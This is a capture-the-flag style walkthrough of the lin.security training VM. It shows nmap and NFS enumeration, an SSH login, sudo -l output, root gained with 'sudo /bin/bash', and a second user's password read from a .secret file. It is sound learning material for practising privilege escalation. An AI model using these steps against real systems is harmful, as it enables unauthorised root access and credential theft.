Lin Security Walkthrough

Description

Here at in.security we wanted to develop a Linux virtual machine that is based, at the time of writing, on an up-to-date Ubuntu distro (18.04 LTS), but suffers from a number of vulnerabilities that allow a user to escalate to root on the box. This has been designed to help understand how certain built-in applications and services if misconfigured, may be abused by an attacker.

We have configured the box to simulate real-world vulnerabilities (albeit on a single host) which will help you to perfect your local privilege escalation skills, techniques and toolsets. There are a number challenges which range from fairly easy to intermediate level and we’re excited to see the methods you use to solve them!

The image is just under 1.7 GB and can be downloaded using the link above. On opening the OVA file a VM named lin.security will be imported and configured with a NAT adapter, but this can be changed to bridged via the the preferences of your preferred virtualisation platform.

To get started you can log onto the host with the credentials: bob/secret

Port scanning

The nmap port scan resulted in the following output:

root@kali:~# nmap -A -p 1-65535 192.168.43.150
Nmap scan report for linsecurity (192.168.43.150)
Host is up (0.00020s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 7a:9b:b9:32:6f:95:77:10:c0:a0:80:35:34:b1:c0:00 (RSA)
|   256 24:0c:7a:82:78:18:2d:66:46:3b:1a:36:22:06:e1:a1 (ECDSA)
|_  256 b9:15:59:78:85:78:9e:a5:e6:16:f6:cf:96:2d:1d:36 (ED25519)
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  3           2049/udp  nfs
|   100003  3,4         2049/tcp  nfs
|   100005  1,2,3      48327/udp  mountd
|   100005  1,2,3      60531/tcp  mountd
|   100021  1,3,4      35925/tcp  nlockmgr
|   100021  1,3,4      55354/udp  nlockmgr
|   100227  3           2049/tcp  nfs_acl
|_  100227  3           2049/udp  nfs_acl
2049/tcp  open  nfs_acl  3 (RPC #100227)
35925/tcp open  nlockmgr 1-4 (RPC #100021)
50119/tcp open  mountd   1-3 (RPC #100005)
52467/tcp open  mountd   1-3 (RPC #100005)
60531/tcp open  mountd   1-3 (RPC #100005)
MAC Address: 08:00:27:A3:D2:FD (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.20 ms linsecurity (192.168.43.150)

It looks like, there’s a shared network filesystem…

root@kali:~# showmount -e 192.168.43.150
Export list for 192.168.43.150:
/home/peter *

As you can see, peter’s home folder was shared, but after mounting, I couldn’t find anything interesting. The creator of the machine provided a username and a password to log in. So, let’s use it!

root@kali:~# ssh bob@192.168.43.150
bob@192.168.43.150's password:

Welcome to lin.security | [https://in.security](https://in.security) | version 1.0

bob@linsecurity:~$

Enumeration

As for enumeration, I checked bob’s privileges:

bob@linsecurity:~$ sudo -l
[sudo] password for bob:
Matching Defaults entries for bob on linsecurity:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bob may run the following commands on linsecurity:
    (ALL) /bin/ash, /usr/bin/awk, /bin/bash, /bin/sh, /bin/csh, /usr/bin/curl, /bin/dash, /bin/ed, /usr/bin/env, /usr/bin/expect, /usr/bin/find, /usr/bin/ftp,
        /usr/bin/less, /usr/bin/man, /bin/more, /usr/bin/scp, /usr/bin/socat, /usr/bin/ssh, /usr/bin/vi, /usr/bin/zsh, /usr/bin/pico, /usr/bin/rvim, /usr/bin/perl,
        /usr/bin/tclsh, /usr/bin/git, /usr/bin/script, /usr/bin/scp

Getting root access

We have the ability run a bunch of things as root, without actually knowing the root password. Probably the most convenient solution is to run the bash program as root.

bob@linsecurity:~$ sudo /bin/bash
root@linsecurity:~# whoami
root

At this point the challenge was over, but I checked out susan’s home directory and found a .secret file.

root@linsecurity:/home/susan# ls -la
total 32
drwxr-xr-x 4 susan susan 4096 Aug  6 21:38 .
drwxr-xr-x 5 root  root  4096 Jul  9 19:58 ..
-rw-r--r-- 1 susan susan  220 Jul  9 19:58 .bash_logout
-rw-r--r-- 1 susan susan 3771 Jul  9 19:58 .bashrc
drwx------ 2 susan susan 4096 Aug  6 21:38 .cache
drwx------ 3 susan susan 4096 Aug  6 21:38 .gnupg
-rw-r--r-- 1 susan susan  807 Jul  9 19:58 .profile
-rw-r--r-- 1 susan susan   20 Jul  9 19:57 .secret
root@linsecurity:/home/susan# cat .secret
MySuperS3cretValue!

It turned out, it was her SSH password…

Before you go

If you found this article helpful, please share to help others with similar interest find it! + Feedback and donations are always welcome!